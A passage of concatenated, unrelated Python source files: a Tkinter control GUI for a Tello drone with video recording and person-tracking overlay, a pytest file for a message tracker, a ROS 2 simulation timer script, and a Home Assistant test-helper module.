self.canvas = Canvas(self.root, height=self.HEIGHT, width=self.WIDTH)
# To connect to the drone and read in image feed
self.flydo = tello.Tello()
self.flydo.connect()
self.flydo.streamon()
# To toggle between takeoff and landing for button
self.flying = False
# For updating Flydo battery reading
self.bat_width = 200
self.bat_height = 50
self.flydo_battery = self.flydo.get_battery()
threading.Thread(target=lambda: self.current_battery()).start()
# For taking screenshots
self.screenshot_taken = False
# For recording videos
self.recording = False
# For tracking function
self.tracking = False
self.tracking_img = None
self.MODEL_PATH = "model/trained_detector.pth"
def takeoff_land(self):
'''Flydo takes off if not flying, lands if flying.'''
if self.flying:
# threading.Thread(target=lambda: dummy_tello_fn()).start()
threading.Thread(target=lambda: self.flydo.land()).start()
self.flying = False
else:
# threading.Thread(target=lambda: dummy_tello_fn()).start()
threading.Thread(target=lambda: self.flydo.takeoff()).start()
self.flying = True
def current_battery(self):
'''Gets Flydo's current battery level every 5 seconds.
Battery level displayed is altered if the battery decreases.'''
while True:
self.flydo_battery = self.flydo.get_battery()
time.sleep(5)
def take_screenshot(self):
'''Takes whatever Flydo current sees and saves the original image (before GUI resizing).'''
if not os.path.exists("screenshots"):
os.mkdir("screenshots")
pic_name = str(datetime.datetime.now())
pic_name = pic_name.replace(":", "-").replace(" ", "-").replace(".", "-")
threading.Thread(target=lambda: cv2.imwrite(f"screenshots/{pic_name}.png", self.current_img)).start()
self.screenshot_taken = True
def take_video(self):
'''Click record button once to start recording, click again to stop and save video.'''
if not os.path.exists("recordings"):
os.mkdir("recordings")
if not os.path.exists("unprocessed_recordings"):
os.mkdir("unprocessed_recordings")
if self.recording:
self.recording = False
# Post-processing because Flydo saved video is 5X slower for some reason.
clip = VideoFileClip(f"unprocessed_recordings/{self.vid_name}.avi")
final = clip.fx(vfx.speedx, 5)
threading.Thread(target=lambda: final.write_videofile(f"recordings/{self.vid_name}.mp4")).start() # Speed up video 5X, save as mp4
else:
# First remove old unprocessed videos to save space
for vid in os.listdir("unprocessed_recordings"):
os.remove(f"unprocessed_recordings/{vid}")
self.recording = True
threading.Thread(target=lambda: self.take_video_helper()).start()
def take_video_helper(self):
'''This is just to make threading easier, cuz creating the video uses a while loop.'''
self.vid_name = str(datetime.datetime.now())
self.vid_name = self.vid_name.replace(":", "-").replace(" ", "-").replace(".", "-")
videowriter = cv2.VideoWriter(f"unprocessed_recordings/{self.vid_name}.avi", cv2.VideoWriter_fourcc('M','J','P','G'), 30, (self.current_img.shape[1], self.current_img.shape[0]))
i = 0
while self.recording:
frame = self.current_img
videowriter.write(frame)
def track_person(self):
'''Uses trained Faster R-CNN model to create bounding box,
positions center of Flydo's POV towards center of bbox.'''
if self.tracking:
self.tracking = False
print("Stopped tracking")
else:
self.tracking = True
threading.Thread(target=lambda: self.tracking_helper()).start()
print("Now tracking")
def tracking_helper(self):
'''Just a helper function for threading purposes.'''
device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
model = torch.load(self.MODEL_PATH)
model.eval() # Set to evaluation mode
transform = get_transform()
while self.tracking:
with torch.no_grad():
img = Image.fromarray(cv2.cvtColor(self.current_img, cv2.COLOR_BGR2RGB)) # Convert cv2 img to PIL
img = transform(img).to(device)
img = img.unsqueeze(0) # Add an extra first dimension, because the model predicts in batches
prediction = model(img)
try:
max_idx = np.argmax(prediction[0]["scores"].cpu().numpy())
confidence = prediction[0]["scores"][max_idx].cpu().numpy()
bbox_coords = prediction[0]["boxes"].cpu().numpy()[max_idx]
bbox_coords = [int(x) for x in bbox_coords]
image = self.current_img
image = cv2.rectangle(image, (bbox_coords[0], bbox_coords[1]), (bbox_coords[2], bbox_coords[3]), (0, 0, 255), 2)
image = cv2.putText(image, f"{int(confidence*100)}%", (bbox_coords[0], bbox_coords[1]), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2, cv2.LINE_AA)
except ValueError: # If there are no boxes detected
pass
image = cv2.putText(image, "Now Tracking", (30, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2, cv2.LINE_AA)
self.tracking_img = image # This will be the new overlay
def run_app(self):
# For background image
bg_dir = "C:\\Users\\charl\\Desktop\\flydo\\docs\\Tacit.jpg"
img = Image.open(bg_dir).resize((self.WIDTH, self.HEIGHT))
bg_label = Label(self.root)
bg_label.img = ImageTk.PhotoImage(img)
bg_label["image"] = bg_label.img
bg_label.place(x=0, y=0, relwidth=1, relheight=1)
# Takeoff/Land button
takeoff_button = Button(self.root, text="Takeoff/Land", font=("Verdana", 18), bg="#95dff3", command=lambda: self.takeoff_land())
tl_width = 200
tl_height = 100
takeoff_button.config(width=tl_width, height=tl_height)
takeoff_button.place(relx=0.5-(self.bat_width/self.WIDTH)/2, rely=0.625, relwidth=tl_width/self.WIDTH, height=80)
# Fly upwards button
upward_button = Button(self.root, text=" /\ \n||", font=("Verdana", 18), bg="#95dff3")
upward_button.place(x=100, rely=0.65, width=80, height=80)
upward_button.bind("<ButtonPress-1>", lambda event: start_flying(event, "upward", self.flydo))
upward_button.bind("<ButtonRelease-1>", lambda event: stop_flying(event, self.flydo))
# Fly downwards button
downward_button = Button(self.root, text=" || \n\/", font=("Verdana", 18), bg="#95dff3")
downward_button.place(x=100, rely=0.85, width=80, height=80)
downward_button.bind("<ButtonPress-1>", lambda event: start_flying(event, "downward", self.flydo))
downward_button.bind("<ButtonRelease-1>", lambda event: stop_flying(event, self.flydo))
# Fly forwards button
forward_button = Button(self.root, text=" /\ \n||", font=("Verdana", 18), bg="#95dff3")
forward_button.place(x=self.WIDTH-180, rely=0.65, width=80, height=80)
forward_button.bind("<ButtonPress-1>", lambda event: start_flying(event, "forward", self.flydo))
forward_button.bind("<ButtonRelease-1>", lambda event: stop_flying(event, self.flydo))
# Fly backwards button
backward_button = Button(self.root, text=" || \n\/", font=("Verdana", 18), bg="#95dff3")
backward_button.place(x=self.WIDTH-180, rely=0.85, width=80, height=80)
backward_button.bind("<ButtonPress-1>", lambda event: start_flying(event, "backward", self.flydo))
backward_button.bind("<ButtonRelease-1>", lambda event: stop_flying(event, self.flydo))
# Yaw left button
yawleft_button = Button(self.root, text="<=", font=("Verdana", 18), bg="#95dff3")
yawleft_button.place(x=20, rely=(0.85+0.65)/2, width=80, height=80)
yawleft_button.bind("<ButtonPress-1>", lambda event: start_flying(event, "yaw_left", self.flydo))
yawleft_button.bind("<ButtonRelease-1>", lambda event: stop_flying(event, self.flydo))
# Yaw right button
yawright_button = Button(self.root, text="=>", font=("Verdana", 18), bg="#95dff3")
yawright_button.place(x=180, rely=(0.85+0.65)/2, width=80, height=80)
yawright_button.bind("<ButtonPress-1>", lambda event: start_flying(event, "yaw_right", self.flydo))
yawright_button.bind("<ButtonRelease-1>", lambda event: stop_flying(event, self.flydo))
# Fly left button
flyleft_button = Button(self.root, text="<=", font=("Verdana", 18), bg="#95dff3")
flyleft_button.place(x=self.WIDTH-260, rely=(0.85+0.65)/2, width=80, height=80)
flyleft_button.bind("<ButtonPress-1>", lambda event: start_flying(event, "left", self.flydo))
flyleft_button.bind("<ButtonRelease-1>", lambda event: stop_flying(event, self.flydo))
# Fly right button
flyright_button = Button(self.root, text="=>", font=("Verdana", 18), bg="#95dff3")
flyright_button.place(x=self.WIDTH-100, rely=(0.85+0.65)/2, width=80, height=80)
flyright_button.bind("<ButtonPress-1>", lambda event: start_flying(event, "right", self.flydo))
flyright_button.bind("<ButtonRelease-1>", lambda event: stop_flying(event, self.flydo))
# Flip left button
flipleft_button = Button(self.root, text="<<", font=("Verdana", 18), bg="#95dff3")
flipleft_button.place(x=100, rely=(0.85+0.65)/2, width=80, height=80)
flipleft_button.bind("<ButtonPress-1>", lambda event: start_flying(event, "flip_left", self.flydo))
flipleft_button.bind("<ButtonRelease-1>", lambda event: stop_flying(event, self.flydo))
# Flip right button
flipright_button = Button(self.root, text=">>", font=("Verdana", 18), bg="#95dff3")
flipright_button.place(x=self.WIDTH-180, rely=(0.85+0.65)/2, width=80, height=80)
flipright_button.bind("<ButtonPress-1>", lambda event: start_flying(event, "flip_right", self.flydo))
flipright_button.bind("<ButtonRelease-1>", lambda event: stop_flying(event, self.flydo))
# Take picture button
picture_button = Button(self.root, text="•", font=("Verdana", 18), bg="#95dff3", command=lambda: self.take_screenshot())
picture_button.place(x=280, rely=(0.85+0.65)/2, width=80, height=80)
# Take video button
video_button = Button(self.root, fg="red", text="•", font=("Verdana", 18), bg="#95dff3", command=lambda: self.take_video())
video_button.place(x=440, rely=(0.85+0.65)/2, width=80, height=80)
# Track person button
tracking_button = Button(self.root, text="⌐╦╦═─", font=("Verdana", 16), bg="#95dff3", command=lambda: self.track_person())
tracking_button.place(x=360, rely=(0.85+0.65)/2, width=80, height=80)
# For video stream
self.cap_label = Label(self.root)
self.cap_label.pack()
self.display_battery()
self.video_stream()
self.canvas.pack()
self.root.mainloop()
def display_battery(self):
'''Displays and updates current battery level.
Battery level is replaced with "Screenshotted" briefly when a screenshot is taken successfully.'''
if self.screenshot_taken:
battery = Label(text=f"Screenshotted", font=("Verdana", 18), bg="#95dff3")
battery.config(width=self.bat_width, height=self.bat_height)
battery.place(relx=0.5-(self.bat_width/self.WIDTH)/2, rely=0.875, relwidth=self.bat_width/self.WIDTH, height=80)
self.root.after(500, self.display_battery)
self.screenshot_taken = False
elif self.recording:
battery = Label(text=f"Recording", font=("Verdana", 18), bg="#95dff3")
battery.config(width=self.bat_width, height=self.bat_height)
battery.place(relx=0.5-(self.bat_width/self.WIDTH)/2, rely=0.875, relwidth=self.bat_width/self.WIDTH, height=80)
self.root.after(5, self.display_battery)
else:
battery = Label(text=f"Battery: {int(self.flydo_battery)}%", font=("Verdana", 18), bg="#95dff3")
battery.config(width=self.bat_width, height=self.bat_height)
battery.place(relx=0.5-(self.bat_width/self.WIDTH)/2, rely=0.875, relwidth=self.bat_width/self.WIDTH, height=80)
self.root.after(5, self.display_battery)
def video_stream(self):
h = 480
w = 720
frame = self.flydo.get_frame_read().frame
self.current_img = frame # For taking screenshots
if self.tracking and self.tracking_img is not None:
frame = cv2.resize(self.tracking_img, (w, h))
else:
frame = cv2.resize(frame, (w, h))
cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)
img = Image.fromarray(cv2image)
imgtk = ImageTk.PhotoImage(image=img)
self.cap_label.place(x=self.WIDTH/2 - w/2, y=0)
self.cap_label.imgtk = imgtk
self.cap_label.configure(image=imgtk)
self.cap_label.after(5, self.video_stream)
if __name__ == "__main__":
FlydoGUI = GUI(800, 800)
FlydoGUI.run_app()
|
test_tracking.py
|
import datetime
import logging
import multiprocessing
import pytest
import uuid
from c4.messaging import Envelope, MessageTracker, MessageTrackerDB
log = logging.getLogger(__name__)
@pytest.fixture(scope="function", params=[MessageTracker(), MessageTrackerDB()])
def tracker(request):
return request.param
def test_tracking(tracker):
a = Envelope("a", "b", "test")
aRelatedA = str(uuid.uuid4())
aRelatedB = str(uuid.uuid4())
b = Envelope("a", "b", "test")
bRelatedA = str(uuid.uuid4())
tracker.add(a)
tracker.addRelatedMessage(a.MessageID, aRelatedA)
tracker.addRelatedMessage(a.MessageID, aRelatedB)
tracker.add(b)
tracker.addRelatedMessage(b.MessageID, bRelatedA)
assert tracker.hasMoreRelatedMessages(a.MessageID)
assert tracker.hasMoreRelatedMessages(b.MessageID)
assert len(tracker.getRelatedMessageIds(a.MessageID)) == 2
tracker.removeRelatedMessage(aRelatedA)
tracker.removeRelatedMessage(aRelatedB)
assert tracker.hasMoreRelatedMessages(a.MessageID) == False
assert tracker.hasMoreRelatedMessages(b.MessageID)
assert len(tracker.getRelatedMessageIds(a.MessageID)) == 0
aCopy = tracker.remove(a.MessageID)
assert aCopy.Action == "test"
def test_sharedTracking(tracker):
numberOfProcesses = 10
ids = [str(uuid.uuid4()) for _ in range(numberOfProcesses)]
start = datetime.datetime.utcnow()
a = Envelope("a", "b", "test")
def add(d, relatedId):
tracker.addRelatedMessage(a.MessageID, relatedId)
processes = []
for number in ids:
process = multiprocessing.Process(target=add, args=([tracker, number]))
processes.append(process)
process.start()
for process in processes:
process.join()
end = datetime.datetime.utcnow()
assert len(tracker.getRelatedMessageIds(a.MessageID)) == numberOfProcesses
logging.debug("testing %s backend took %s", tracker.__class__, end-start)
def test_updating():
tracker = MessageTracker()
a = Envelope("a", "b", "test")
a.Message = {"same": 1,
"valueChange1": 1,
"valueChange2": {"test": "test"},
"valueChange3": {"test": {"test2": "test"}},
"onlyInOne": 1
}
tracker.add(a)
content = {"same": 1,
"valueChange1": 2,
"valueChange2": {"test": "newValue"},
"valueChange3": {"test": {"test2": "newValue"}},
"onlyInTwo1": 1,
"onlyInTwo2": {"test": "test"}
}
tracker.updateMessageContent(a.MessageID, content)
merged = tracker.messages[a.MessageID].Message
assert merged["same"] == 1
assert merged["onlyInOne"] == 1
assert merged["onlyInTwo1"] == 1
assert merged["onlyInTwo2"] == {"test": "test"}
assert merged["valueChange1"] == 2
assert merged["valueChange2"] == {"test": "newValue"}
assert merged["valueChange3"] == {"test": {"test2": "newValue"}}
|
set_simulation_timer.py
|
#!/usr/bin/env python3
# Copyright (c) 2020 The Plankton Authors.
# All rights reserved.
#
# This source code is derived from UUV Simulator
# (https://github.com/uuvsimulator/uuv_simulator)
# Copyright (c) 2016-2019 The UUV Simulator Authors
# licensed under the Apache license, Version 2.0
# cf. 3rd-party-licenses.txt file in the root directory of this source tree.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import rclpy
import rclpy.clock
import time
import threading
from plankton_utils.time import time_in_float_sec
from plankton_utils.time import is_sim_time
#==============================================================================
def main():
rclpy.init()
sim_time_param = is_sim_time()
node = rclpy.create_node('set_simulation_timer',
allow_undeclared_parameters=True,
automatically_declare_parameters_from_overrides=True,
parameter_overrides=[sim_time_param])
timeout = 0.0
if node.has_parameter('timeout'):
timeout = node.get_parameter('timeout').get_parameter_value().double_value
if timeout <= 0:
raise RuntimeError('Termination time must be a positive floating point value (X.Y)')
node.get_logger().info('Starting simulation timer - Timeout = {} s'.format(timeout))
# Note that node's clock will be initialized from the /clock topic during the spin in sim tim mode
# Behaviour of Rate changed in ROS 2. To wake it up, it needs to be triggered from a separate
# thread. Maybe a rclpy.spin_once + time.sleep() would be enough
FREQ = 100
rate = node.create_rate(FREQ)
thread = threading.Thread(target=rclpy.spin, args=(node,), daemon=True)
thread.start()
while time_in_float_sec(node.get_clock().now()) < timeout:
# Just a guard for really short timeouts
if 1.0 / FREQ < timeout:
rate.sleep()
node.get_logger().info('Simulation timeout - Killing simulation...')
# destroy_node() prevents a further warning on exit
node.destroy_node()
rclpy.shutdown()
thread.join()
#==============================================================================
if __name__ == '__main__':
try:
main()
except Exception as e:
print('Caught exception: ' + str(e))
print('Exiting')
|
common.py
|
"""Test the helper method for writing tests."""
import asyncio
from collections import OrderedDict
from datetime import timedelta
import functools as ft
import json
import os
import sys
from unittest.mock import patch, MagicMock, Mock
from io import StringIO
import logging
import threading
from contextlib import contextmanager
from homeassistant import auth, core as ha, config_entries
from homeassistant.auth import (
models as auth_models, auth_store, providers as auth_providers)
from homeassistant.setup import setup_component, async_setup_component
from homeassistant.config import async_process_component_config
from homeassistant.helpers import (
intent, entity, restore_state, entity_registry,
entity_platform, storage)
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.dt as date_util
import homeassistant.util.yaml as yaml
from homeassistant.const import (
STATE_ON, STATE_OFF, DEVICE_DEFAULT_NAME, EVENT_TIME_CHANGED,
EVENT_STATE_CHANGED, EVENT_PLATFORM_DISCOVERED, ATTR_SERVICE,
ATTR_DISCOVERED, SERVER_PORT, EVENT_HOMEASSISTANT_CLOSE)
from homeassistant.components import mqtt, recorder
from homeassistant.util.async_ import (
run_callback_threadsafe, run_coroutine_threadsafe)
_TEST_INSTANCE_PORT = SERVER_PORT
_LOGGER = logging.getLogger(__name__)
INSTANCES = []
CLIENT_ID = 'https://example.com/app'
CLIENT_REDIRECT_URI = 'https://example.com/app/callback'
def threadsafe_callback_factory(func):
"""Create threadsafe functions out of callbacks.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_callback_threadsafe(
hass.loop, ft.partial(func, *args, **kwargs)).result()
return threadsafe
def threadsafe_coroutine_factory(func):
"""Create threadsafe functions out of coroutine.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_coroutine_threadsafe(
func(*args, **kwargs), hass.loop).result()
return threadsafe
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), 'testing_config', *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
if sys.platform == "win32":
loop = asyncio.ProactorEventLoop()
else:
loop = asyncio.new_event_loop()
hass = loop.run_until_complete(async_test_home_assistant(loop))
stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
stop_event.set()
orig_stop = hass.stop
def start_hass(*mocks):
"""Start hass."""
run_coroutine_threadsafe(hass.async_start(), loop=hass.loop).result()
def stop_hass():
"""Stop hass."""
orig_stop()
stop_event.wait()
loop.close()
hass.start = start_hass
hass.stop = stop_hass
threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
return hass
# pylint: disable=protected-access
@asyncio.coroutine
def async_test_home_assistant(loop):
"""Return a Home Assistant object pointing at test config dir."""
hass = ha.HomeAssistant(loop)
hass.config.async_load = Mock()
store = auth_store.AuthStore(hass)
hass.auth = auth.AuthManager(hass, store, {}, {})
ensure_auth_manager_loaded(hass.auth)
INSTANCES.append(hass)
orig_async_add_job = hass.async_add_job
orig_async_add_executor_job = hass.async_add_executor_job
orig_async_create_task = hass.async_create_task
def async_add_job(target, *args):
"""Add job."""
if isinstance(target, Mock):
return mock_coro(target(*args))
return orig_async_add_job(target, *args)
def async_add_executor_job(target, *args):
"""Add executor job."""
if isinstance(target, Mock):
return mock_coro(target(*args))
return orig_async_add_executor_job(target, *args)
def async_create_task(coroutine):
"""Create task."""
if isinstance(coroutine, Mock):
return mock_coro()
return orig_async_create_task(coroutine)
hass.async_add_job = async_add_job
hass.async_add_executor_job = async_add_executor_job
hass.async_create_task = async_create_task
hass.config.location_name = 'test home'
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = date_util.get_time_zone('US/Pacific')
hass.config.units = METRIC_SYSTEM
hass.config.skip_pip = True
hass.config_entries = config_entries.ConfigEntries(hass, {})
hass.config_entries._entries = []
hass.config_entries._store._async_ensure_stop_listener = lambda: None
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
@asyncio.coroutine
def mock_async_start():
"""Start the mocking."""
# We only mock time during tests and we want to track tasks
with patch('homeassistant.core._async_create_timer'), \
patch.object(hass, 'async_stop_track_tasks'):
yield from orig_start()
hass.async_start = mock_async_start
@ha.callback
def clear_instance(event):
"""Clear global instance."""
INSTANCES.remove(hass)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
return hass
def get_test_instance_port():
"""Return unused port for running test instance.
The socket that holds the default port does not get released when we stop
HA in a different test case. Until I have figured out what is going on,
let's run each test on a different port.
"""
global _TEST_INSTANCE_PORT
_TEST_INSTANCE_PORT += 1
return _TEST_INSTANCE_PORT
@ha.callback
def async_mock_service(hass, domain, service, schema=None):
"""Set up a fake service & return a calls log list to this service."""
calls = []
@ha.callback
def mock_service_log(call): # pylint: disable=unnecessary-lambda
"""Mock service call."""
calls.append(call)
hass.services.async_register(
domain, service, mock_service_log, schema=schema)
return calls
mock_service = threadsafe_callback_factory(async_mock_service)
@ha.callback
def async_mock_intent(hass, intent_typ):
"""Set up a fake intent handler."""
intents = []
class MockIntentHandler(intent.IntentHandler):
intent_type = intent_typ
@asyncio.coroutine
def async_handle(self, intent):
"""Handle the intent."""
intents.append(intent)
return intent.create_response()
intent.async_register(hass, MockIntentHandler())
return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
"""Fire the MQTT message."""
if isinstance(payload, str):
payload = payload.encode('utf-8')
msg = mqtt.Message(topic, payload, qos, retain)
hass.async_run_job(hass.data['mqtt']._mqtt_on_message, None, None, msg)
fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(hass, time):
"""Fire a time changes event."""
hass.bus.async_fire(EVENT_TIME_CHANGED, {'now': time})
fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.fire(EVENT_PLATFORM_DISCOVERED, {
ATTR_SERVICE: service,
ATTR_DISCOVERED: info
})
def load_fixture(filename):
"""Load a fixture."""
path = os.path.join(os.path.dirname(__file__), 'fixtures', filename)
with open(path, encoding='utf-8') as fptr:
return fptr.read()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {
'entity_id': new_state.entity_id,
'new_state': new_state,
}
if old_state:
event_data['old_state'] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context)
@asyncio.coroutine
def async_mock_mqtt_component(hass, config=None):
"""Mock the MQTT component."""
if config is None:
config = {mqtt.CONF_BROKER: 'mock-broker'}
with patch('paho.mqtt.client.Client') as mock_client:
mock_client().connect.return_value = 0
mock_client().subscribe.return_value = (0, 0)
mock_client().publish.return_value = (0, 0)
result = yield from async_setup_component(hass, mqtt.DOMAIN, {
mqtt.DOMAIN: config
})
assert result
hass.data['mqtt'] = MagicMock(spec_set=hass.data['mqtt'],
wraps=hass.data['mqtt'])
return hass.data['mqtt']
mock_mqtt_component = threadsafe_coroutine_factory(async_mock_mqtt_component)
@ha.callback
def mock_component(hass, component):
"""Mock a component is setup."""
if component in hass.config.components:
AssertionError("Component {} is already setup".format(component))
hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
"""Mock the Entity Registry."""
registry = entity_registry.EntityRegistry(hass)
registry.entities = mock_entries or {}
async def _get_reg():
return registry
hass.data[entity_registry.DATA_REGISTRY] = \
hass.loop.create_task(_get_reg())
return registry
class MockUser(auth_models.User):
"""Mock a user in Home Assistant."""
def __init__(self, id=None, is_owner=False, is_active=True,
name='Mock User', system_generated=False):
"""Initialize mock user."""
kwargs = {
'is_owner': is_owner,
'is_active': is_active,
'name': name,
'system_generated': system_generated,
}
if id is not None:
kwargs['id'] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._users[self.id] = self
return self
async def register_auth_provider(hass, config):
"""Register an auth provider."""
provider = await auth_providers.auth_provider_from_config(
hass, hass.auth._store, config)
assert provider is not None, 'Invalid config specified'
key = (provider.type, provider.id)
providers = hass.auth._providers
if key in providers:
raise ValueError('Provider already registered')
providers[key] = provider
return provider
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
"""Ensure an auth manager is considered loaded."""
store = auth_mgr._store
if store._users is None:
store._users = OrderedDict()
class MockModule:
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(self, domain=None, dependencies=None, setup=None,
requirements=None, config_schema=None, platform_schema=None,
async_setup=None, async_setup_entry=None,
async_unload_entry=None):
"""Initialize the mock module."""
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if setup is not None:
# We run this in executor, wrap it in function
self.setup = lambda *args: setup(*args)
if async_setup is not None:
self.async_setup = async_setup
if setup is None and async_setup is None:
self.async_setup = mock_coro_func(True)
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if async_unload_entry is not None:
self.async_unload_entry = async_unload_entry
class MockPlatform:
"""Provide a fake platform."""
# pylint: disable=invalid-name
def __init__(self, setup_platform=None, dependencies=None,
platform_schema=None, async_setup_platform=None,
async_setup_entry=None, scan_interval=None):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if scan_interval is not None:
self.SCAN_INTERVAL = scan_interval
if setup_platform is not None:
# We run this in executor, wrap it in function
self.setup_platform = lambda *args: setup_platform(*args)
if async_setup_platform is not None:
self.async_setup_platform = async_setup_platform
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if setup_platform is None and async_setup_platform is None:
self.async_setup_platform = mock_coro_func()
class MockEntityPlatform(entity_platform.EntityPlatform):
"""Mock class with some mock defaults."""
def __init__(
self, hass,
logger=None,
domain='test_domain',
platform_name='test_platform',
platform=None,
scan_interval=timedelta(seconds=15),
entity_namespace=None,
async_entities_added_callback=lambda: None
):
"""Initialize a mock entity platform."""
if logger is None:
logger = logging.getLogger('homeassistant.helpers.entity_platform')
# Otherwise the constructor will blow up.
if (isinstance(platform, Mock) and
isinstance(platform.PARALLEL_UPDATES, Mock)):
platform.PARALLEL_UPDATES = 0
super().__init__(
hass=hass,
logger=logger,
domain=domain,
platform_name=platform_name,
platform=platform,
scan_interval=scan_interval,
entity_namespace=entity_namespace,
async_entities_added_callback=async_entities_added_callback,
)
class MockToggleDevice(entity.ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state):
"""Initialize the mock device."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the device if any."""
self.calls.append(('name', {}))
return self._name
@property
def state(self):
"""Return the name of the device if any."""
self.calls.append(('state', {}))
return self._state
@property
def is_on(self):
"""Return true if device is on."""
self.calls.append(('is_on', {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the device on."""
self.calls.append(('turn_on', kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the device off."""
self.calls.append(('turn_off', kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
if method is None:
return self.calls[-1]
try:
return next(call for call in reversed(self.calls)
if call[0] == method)
except StopIteration:
return None
class MockConfigEntry(config_entries.ConfigEntry):
"""Helper for creating config entries that adds some defaults."""
def __init__(self, *, domain='test', data=None, version=0, entry_id=None,
source=config_entries.SOURCE_USER, title='Mock Title',
state=None):
"""Initialize a mock config entry."""
kwargs = {
'entry_id': entry_id or 'mock-id',
'domain': domain,
'data': data or {},
'version': version,
'title': title
}
if source is not None:
kwargs['source'] = source
if state is not None:
kwargs['state'] = state
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
hass.config_entries._entries.append(self)
def add_to_manager(self, manager):
"""Test helper to add entry to entry manager."""
manager._entries.append(self)
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
matchlist = sorted(list(files_dict.keys()), key=len) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if fname in files_dict:
_LOGGER.debug("patch_yaml_files match %s", fname)
res = StringIO(files_dict[fname])
setattr(res, 'name', fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
res = StringIO(files_dict[ends])
setattr(res, 'name', fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if 'homeassistant/components' in fname:
_LOGGER.debug("patch_yaml_files using real file: %s", fname)
return open(fname, encoding='utf-8')
# Not found
raise FileNotFoundError("File not found: {}".format(fname))
return patch.object(yaml, 'open', mock_open_f, create=True)
def mock_coro(return_value=None):
"""Return a coro that returns a value."""
return mock_coro_func(return_value)()
def mock_coro_func(return_value=None):
"""Return a method to create a coro function that returns a value."""
@asyncio.coroutine
def coro(*args, **kwargs):
"""Fake coroutine."""
return return_value
return coro
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
- count: The amount of valid platforms that should be setup
- domain: The domain to count is optional. It can be automatically
determined most of the time
Use as a context manager around setup.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
@ha.callback
def mock_psc(hass, config_input, domain):
"""Mock the prepare_setup_component to capture config."""
res = async_process_component_config(
hass, config_input, domain)
config[domain] = None if res is None else res.get(domain)
_LOGGER.debug("Configuration for %s, Validated: %s, Original %s",
domain, config[domain], config_input.get(domain))
return res
assert isinstance(config, dict)
with patch('homeassistant.config.async_process_component_config',
mock_psc):
yield config
if domain is None:
assert len(config) == 1, ('assert_setup_component requires DOMAIN: {}'
.format(list(config.keys())))
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert res_len == count, 'setup_component failed, expected {} got {}: {}' \
.format(count, res_len, res)
def init_recorder_component(hass, add_config=None):
"""Initialize the recorder."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = 'sqlite://' # In memory DB
with patch('homeassistant.components.recorder.migration.migrate_schema'):
assert setup_component(hass, recorder.DOMAIN,
{recorder.DOMAIN: config})
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
